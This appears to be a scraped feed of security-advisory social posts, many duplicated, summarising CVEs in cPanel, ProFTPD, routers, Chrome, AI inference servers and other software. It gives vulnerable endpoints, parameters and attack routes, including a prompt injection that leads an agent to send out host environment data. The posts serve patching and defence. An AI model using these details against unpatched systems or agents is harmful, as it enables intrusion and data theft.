CVE-2026-35547 <https://www.cve.org/CVERecord?id=CVE-2026-35547> FreeBSD-SA-26:17.libnv <https://security.freebsd.org/advisories/FreeBSD-SA-26:17.libnv.asc> credited to Mariusz Zaborski.

<https://papers.freebsd.org/author/mariusz-zaborski/> is currently empty (<https://github.com/freebsd/freebsd-papers/issues/152> relates), should probably comprise:

<https://papers.freebsd.org/2016/asiabsdcon/oshogbo-capsicum_and_casper/>

<https://papers.freebsd.org/2019/bsdcan/zaborski-building_a_security_appliance_based_on_freebsd/>

Cc @jloc0 @ascreen @garyhtech

⚠️ CVE-2026-7470: HIGH severity stack buffer overflow in Tenda 4G300 (US_4G300V1.0Mt_V1.01.42_CN_TDC01). Exploit public, no patch yet. Restrict access & monitor for activity. https://radar.offseq.com/threat/cve-2026-7470-stack-based-buffer-overflow-in-tenda-f207f452 #OffSeq #Vulnerability #Tenda #RouterSecurity

⚠️ CVE-2026-7470: HIGH severity stack buffer overflow in Tenda 4G300 (US_4G300V1.0Mt_V1.01.42_CN_TDC01). Exploit public, no patch yet. Restrict access & monitor for activity. https://radar.offseq.com/threat/cve-2026-7470-stack-based-buffer-overflow-in-tenda-f207f452 #OffSeq #Vulnerability #Tenda #RouterSecurity

RE: https://social.bund.de/@certbund/116492931513061962

https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/

#cPanel #exploit

An authentication bypass security issue has been identified in the cPanel software (including DNSOnly) affecting all versions after 11.40.

This one is ugly, folks. Go update your servers now, and run the detection script.

https://support.cpanel.net/hc/en-us/articles/40073787579671-Security-CVE-2026-41940-cPanel-WHM-WP2-Security-Update-04-28-2026

#Webhosting #cPanel #WHM

🚨 CRITICAL auth bypass in cPanel & WHM (CVE-2026-41940, CVSS 9.3) lets unauthenticated attackers access the control panel. Patch not confirmed — restrict interface to trusted IPs & monitor advisories. https://radar.offseq.com/threat/cve-2026-41940-cwe-306-missing-authentication-for--3aceec8f #OffSeq #cPanel #Vulnerability #Infosec

Major authentication bypass disclosed in cPanel

https://support.cpanel.net/hc/en-us/articles/40073787579671-Security-CVE-2026-41940-cPanel-WHM-WP2-Security-Update-04-28-2026

🔴 CVE-2026-41940 - Critical (9.8)

cPanel and WHM versions prior to 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, and 11.136.0.5 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized acc...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41940/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

@mttaggart Detailed analysis by Watchtowr: https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/

RE: https://social.bund.de/@certbund/116492931513061962

https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/

#cPanel #exploit

An authentication bypass security issue has been identified in the cPanel software (including DNSOnly) affecting all versions after 11.40.

This one is ugly, folks. Go update your servers now, and run the detection script.

https://support.cpanel.net/hc/en-us/articles/40073787579671-Security-CVE-2026-41940-cPanel-WHM-WP2-Security-Update-04-28-2026

#Webhosting #cPanel #WHM

🚨 CRITICAL auth bypass in cPanel & WHM (CVE-2026-41940, CVSS 9.3) lets unauthenticated attackers access the control panel. Patch not confirmed — restrict interface to trusted IPs & monitor advisories. https://radar.offseq.com/threat/cve-2026-41940-cwe-306-missing-authentication-for--3aceec8f #OffSeq #cPanel #Vulnerability #Infosec

Major authentication bypass disclosed in cPanel

https://support.cpanel.net/hc/en-us/articles/40073787579671-Security-CVE-2026-41940-cPanel-WHM-WP2-Security-Update-04-28-2026

🔴 CVE-2026-41940 - Critical (9.8)

cPanel and WHM versions prior to 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, and 11.136.0.5 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized acc...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41940/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

@mttaggart Detailed analysis by Watchtowr: https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940)
#CVE_2026_41940
https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940) - watchTowr Labs https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/

🟠 CVE-2026-7420 - High (8.8)

A security flaw has been discovered in UTT HiPER 1250GW up to 3.2.7-210907-180535. Impacted is the function strcpy of the file route/goform/ConfigAdvideo. The manipulation of the argument Profile results in buffer overflow. The attack can be execu...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7420/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-7420 - High (8.8)

A security flaw has been discovered in UTT HiPER 1250GW up to 3.2.7-210907-180535. Impacted is the function strcpy of the file route/goform/ConfigAdvideo. The manipulation of the argument Profile results in buffer overflow. The attack can be execu...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7420/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-7419 - High (8.8)

A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. This issue affects the function strcpy of the file route/goform/formTaskEdit_ap. The manipulation of the argument Profile leads to buffer overflow. Remote exploitation o...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7419/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-7419 - High (8.8)

A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. This issue affects the function strcpy of the file route/goform/formTaskEdit_ap. The manipulation of the argument Profile leads to buffer overflow. Remote exploitation o...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7419/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-7424 - High (8.1)

Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4.4.1 and V4.2.6 allows an adjacent network actor to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service ...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7424/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-7424 - High (8.1)

Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4.4.1 and V4.2.6 allows an adjacent network actor to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service ...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7424/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-7418 - High (8.8)

A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7418/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-7418 - High (8.8)

A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7418/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-34965 - High (8.8)

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection r...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-34965/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-34965 - High (8.8)

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection r...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-34965/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

New HIGH severity vuln: CVE-2026-42515 impacts CDAC-Noida e-Sushrut HMIS (CVSS 7.1). Authenticated users can bypass auth via manipulated API params — risking patient data. No patch yet. Restrict access & monitor vendor updates. https://radar.offseq.com/threat/cve-2026-42515-cwe-639-authorization-bypass-throug-ffcae9ae #OffSeq #Healthcare #CVE #Security

🚩 CRITICAL: CVE-2026-5166 in Pardus Software Center <1.0.3 enables path traversal — attackers may access/modify files outside restricted dirs. No patch yet. Restrict access, monitor updates. https://radar.offseq.com/threat/cve-2026-5166-cwe-22-improper-limitation-of-a-path-67023af4 #OffSeq #Vuln #Pardus #Infosec

🔴 CVE-2026-5166 - Critical (9.6)

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Software Center allows Path Traversal.

This issue affects Pardus Software Center: befor...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5166/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🚩 CRITICAL: CVE-2026-5166 in Pardus Software Center <1.0.3 enables path traversal — attackers may access/modify files outside restricted dirs. No patch yet. Restrict access, monitor updates. https://radar.offseq.com/threat/cve-2026-5166-cwe-22-improper-limitation-of-a-path-67023af4 #OffSeq #Vuln #Pardus #Infosec

🔴 CVE-2026-5166 - Critical (9.6)

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Software Center allows Path Traversal.

This issue affects Pardus Software Center: befor...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5166/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🔴 New security advisory:

CVE-2026-30893 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-30893-wazuh-cluster-path-traversal-rce

#CVE #SecurityPatching #HackerNews

🔴 CVE-2026-30893 - Critical (9)

Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.4.0 to before version 4.14.4, a path traversal vulnerability in Wazuh's cluster synchronization extraction routine allows an authenticated...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-30893/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🔴 CVE-2026-30893 - Critical (9)

Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.4.0 to before version 4.14.4, a path traversal vulnerability in Wazuh's cluster synchronization extraction routine allows an authenticated...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-30893/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-7466 - High (8.8)

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7466/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-7466 - High (8.8)

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7466/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-0204 - High (8)

A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0204/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-6849 - High (8.8)

Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection.

This issue affects Pardus OS My...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-6849/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-5712 - High (8)

This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5712/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

Critical ProFTPD SQL Injection Flaw Exposes Thousands of Internet-Facing FTP Servers to Remote Attacks

Introduction A newly disclosed security vulnerability in ProFTPD, one of the most widely used FTP server solutions on the internet, has raised serious concerns across the hosting and Linux administration community. Tracked as CVE-2026-42167, the flaw affects the mod_sql extension and can allow attackers to execute code remotely, bypass authentication, escalate…

https://undercodenews.com/critical-proftpd-sql-injection-flaw-exposes-thousands-of-internet-facing-ftp-servers-to-remote-attacks/?utm_source=mastodon&utm_medium=jetpack_social

CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
https://zeropath.com/blog/proftpd-cve-2026-42167-auth-bypass-privesc-rce

CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
#CVE_2026_42167
https://zeropath.com/blog/proftpd-cve-2026-42167-auth-bypass-privesc-rce

🟠 CVE-2026-42167 - High (8.1)

mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42167/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

CRITICAL: Chrome <147.0.7727.138 on Windows is vulnerable to a use-after-free in Accessibility (CVE-2026-7344). Allows sandbox escape after renderer compromise. Patch now to mitigate risk. https://radar.offseq.com/threat/cve-2026-7344-use-after-free-in-google-chrome-1aabf4b9 #OffSeq #Chrome #Vuln #Cybersecurity

⚠️ CRITICAL: CVE-2026-7343 in Chrome (Windows <147.0.7727.138) is a use-after-free in Views that could allow renderer sandbox escape. Patch ASAP to mitigate. No known exploits yet. https://radar.offseq.com/threat/cve-2026-7343-use-after-free-in-google-chrome-6725c92f #OffSeq #Chrome #Vulnerability #Security

🚨 New security advisory:

CVE-2026-42523 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-42523-jenkins-github-plugin-stored-xss

#Cybersecurity #ZeroDay #ThreatIntel

🚨 CRITICAL: Jenkins GitHub Plugin ≤1.46.0 has a stored XSS (CVE-2026-42523). Attackers with Overall/Read permission can run JS in users' browsers. Limit permissions & check vendor for patches. https://radar.offseq.com/threat/cve-2026-42523-vulnerability-in-jenkins-project-je-d7de8e87 #OffSeq #Jenkins #XSS #Vuln

🚨 CRITICAL: Jenkins GitHub Plugin ≤1.46.0 has a stored XSS (CVE-2026-42523). Attackers with Overall/Read permission can run JS in users' browsers. Limit permissions & check vendor for patches. https://radar.offseq.com/threat/cve-2026-42523-vulnerability-in-jenkins-project-je-d7de8e87 #OffSeq #Jenkins #XSS #Vuln

CERT/CC issued advisory VU#915947 for SGLang (an AI inference server), CVE-2026-5760, severity 9.8. A poisoned GGUF model file carries a chat-template that SGLang renders through Jinja2 with no sandbox. Arbitrary Python runs on the host. Same root cause as llama-cpp-python (2024) and vLLM (2025). Sandboxed Jinja2 existed the whole time and three frameworks left the line untouched. Any GGUF you did not build yourself runs code on load.

#AI #InfoSec #CyberSecurity #OpenSource #LLM

🔴 CVE-2026-7321 - Critical (9.6)

Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox ESR 140.10.1.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7321/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

RE: https://infosec.exchange/@cR0w/116483262430297764

lol

https://www.cve.org/CVERecord?id=CVE-2026-42615

🔎 XSS (HIGH, CVSS 7.2) in GCHQ CyberChef <11.0.0 (CVE-2026-42615): Improper input neutralization in Show Base64 offsets lets attackers inject scripts remotely — info theft/session hijack possible. No fix yet. Avoid untrusted input. https://radar.offseq.com/threat/cve-2026-42615-cwe-79-improper-neutralization-of-i-760a9adb #OffSeq #CyberChef #XSS

MEDIUM severity SSRF (CVE-2026-23773) found in Dell DLm8700 📢. Low-priv remote attackers can trigger server-side requests. No known exploits, no patch yet — restrict access & follow vendor advisories. https://radar.offseq.com/threat/cve-2026-23773-cwe-918-server-side-request-forgery-08701a02 #OffSeq #SSRF #Dell #Cybersecurity

🔴 CVE-2026-41873 - Critical (9.8)

** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover.

This issue affects all versions of the Lua implementation of Pony Mail....

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41873/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

New Episode: SANS Stormcast Thursday, April 30th, 2026: Odd Requests; MSFT LNK Bug Exploited; Secure Boot Fix; TLS Updates; SAP npm malware

Shownotes:

Today's Odd Web Requests
https://isc.sans.edu/diary/Today%27s%20Odd%20Web%20Requests/32934
Incomplete Patch of APT28's Zero-Day Leads to CVE-2026-32202
https://www.akamai.com/blog/security-research/2026/apr/incomplete-patch-apt28s-zero

Transcript

AntennaPod | Anytime Player | Apple Podcasts | Castamatic | CurioCaster | Fountain | gPodder | Overcast | Pocket Casts | Podcast Addict | Podcast Guru | Podnews | Podverse | Truefans

Or Listen right here.

Broadcom has a new advisory for a critical vulnerability:

ESM Microservice 15.0 Vulnerability in Apache Tomcat https://support.broadcom.com/web/ecx/security-advisory #Broadcom #ApacheTomCat
---

Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports https://talosintelligence.com/vulnerability_info @TalosSecurity #zeroday
---

From yesterday:

CISA added two vulnerabilities to the KEV catalogue:

- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-32202

- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-1708

- Also, one industrial vulnerability https://www.cisa.gov/news-events/ics-advisories/icsa-26-118-01 #CISA #Microsoft #vulnerability #infosec

Microsoft Confirms Active Exploitation of Windows Shell Flaw CVE-2026-32202

Microsoft confirmed active exploitation of CVE-2026-32202, a Windows Shell flaw that allows zero-click NTLM credential theft via malicious LNK files. The vulnerability is an incomplete fix for earlier RCE flaws used by the APT28 threat group in targeted espionage campaigns.

**Apply Microsoft's April 2026 patches immediately to all Windows systems, as this vulnerability steals your credentials just by viewing a folder containing a malicious shortcut file - no clicking required. Block outbound SMB traffic (ports 445 and 139) at your firewall to prevent credential theft.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/microsoft-confirms-active-exploitation-of-windows-shell-flaw-cve-2026-32202-0-8-6-0-i/gD2P6Ple2L

Vols d’identifiants sur Windows : Microsoft révèle l’exploitation de la CVE-2026-32202 https://www.it-connect.fr/vols-didentifiants-sur-windows-microsoft-revele-lexploitation-de-la-cve-2026-32202/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #Microsoft #Windows

🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0428)

CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2024-1708 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-1708)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 ; https://nvd.nist.gov/vuln/detail/CVE-2024-1708

⚠️ CVE-2026-32202 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-32202)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-32202 ; https://nvd.nist.gov/vuln/detail/CVE-2026-32202

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202

🛡️ Title: Windows Shell Spoofing Vulnerability
Description

🛡️ Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.

https://www.cve.org/CVERecord?id=CVE-2026-32202

#cybersecurity #security #windows #microsoft

CVE ID: CVE-2026-32202
Vendor: Microsoft
Product: Windows
Date Added: 2026-04-28
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-32202

Broadcom has a new advisory for a critical vulnerability:

ESM Microservice 15.0 Vulnerability in Apache Tomcat https://support.broadcom.com/web/ecx/security-advisory #Broadcom #ApacheTomCat
---

Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports https://talosintelligence.com/vulnerability_info @TalosSecurity #zeroday
---

From yesterday:

CISA added two vulnerabilities to the KEV catalogue:

- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-32202

- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-1708

- Also, one industrial vulnerability https://www.cisa.gov/news-events/ics-advisories/icsa-26-118-01 #CISA #Microsoft #vulnerability #infosec

CISA Reports Active Exploitation of ConnectWise Flaw

CISA reports active exploitation of ConnectWise ScreenConnect (CVE-2024-1708) that allow for remote code execution and security mechanism bypasses. CISA is requiring patching by May 12, 2026.

**If you're using ConnectWise ScreenConnect, update to the latest patched version ASAP. Your ScreenConnect is being actively exploited to deploy ransomware. If you can't patch right away, restrict access to the ScreenConnect server to trusted networks only and monitor for any signs of unauthorized access or suspicious activity.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/cisa-reports-active-exploitation-of-connectwise-flaw-x-k-o-s-c/gD2P6Ple2L

🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0428)

CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2024-1708 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-1708)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 ; https://nvd.nist.gov/vuln/detail/CVE-2024-1708

⚠️ CVE-2026-32202 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-32202)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-32202 ; https://nvd.nist.gov/vuln/detail/CVE-2026-32202

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202

CVE ID: CVE-2024-1708
Vendor: ConnectWise
Product: ScreenConnect
Date Added: 2026-04-28
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-1708

Critical Unpatched RCE Vulnerability in Hugging Face LeRobot Robotics Platform

Hugging Face's LeRobot robotics platform contains a critical unpatched vulnerability (CVE-2026-25874) that allows unauthenticated remote code execution via unsafe pickle deserialization. Attackers can exploit exposed gRPC endpoints to take full control of robotics servers and connected hardware.

**If you're using Hugging Face LeRobot, make sure all robot devices and servers are isolated from the internet and accessible only from trusted networks. Until version 0.6.0 is released with a fix for CVE-2026-25874, run LeRobot as a non-root user inside restricted containers, and monitor for unusual processes or outbound traffic.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-unpatched-rce-vulnerability-in-hugging-face-lerobot-robotics-platform-z-j-o-7-g/gD2P6Ple2L

Critical Unpatched Flaw Leaves Hugging Face LeRobot Open to Unauthenticated RCE

https://thehackernews.com/2026/04/critical-cve-2026-25874-leaves-hugging.html

Read on HackerWorkspace: https://hackerworkspace.com/article/critical-unpatched-flaw-leaves-hugging-face-lerobot-open-to-unauthenticated-rce

#cybersecurity #aisecurity #vulnerability

📰 Critical Unpatched RCE Flaw in Hugging Face's LeRobot AI Platform Puts Robotics Systems at Risk

🚨 CRITICAL FLAW: Unpatched RCE (CVE-2026-25874, CVSS 9.3) in Hugging Face's LeRobot AI platform. Unsafe deserialization allows unauthenticated attackers to execute code. #CVE202625874 #HuggingFace #AI #RCE

🔗 https://cyber.netsecops.io

🟠 CVE-2026-24222 - High (8.6)

NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initialization component, where a remote attacker could cause improper access control by sending prompt-injected content that causes the agent to read and exfiltrate host environm...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24222/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability

🟠 CVE-2026-7289 - High (8.8)

A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the function sub_414BA8 of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url results in buffer overflow. The attack can be executed remotely. Th...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7289/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-7288 - High (8.8)

A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability affects the function sub_4151FC of the file /boafrm/formVpnConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the a...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7288/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-38651 - High (8.2)

Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-38651/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-7279 - High (7.8)

AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a malicious DLL in a specific directory, resulting in arbitrary code execution with system privileges when the system loads t...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7279/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2025-67223 - High (7.5)

The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtua...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-67223/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

Spring Boot Security Update Patches Critical Authentication Bypass and RCE Flaws

Spring Boot reports three vulnerabilities, including a critical authentication bypass (CVE-2026-40976) and flaws allowing session hijacking or remote code execution via timing attacks.

**If you use Spring Boot, upgrade ASAP to a patched version (4.0.6, 3.5.14, 3.4.16, 3.3.19, or 2.7.33). Until patched, restrict access to your applications from trusted networks only and disable DevTools and Actuator endpoints in production.**
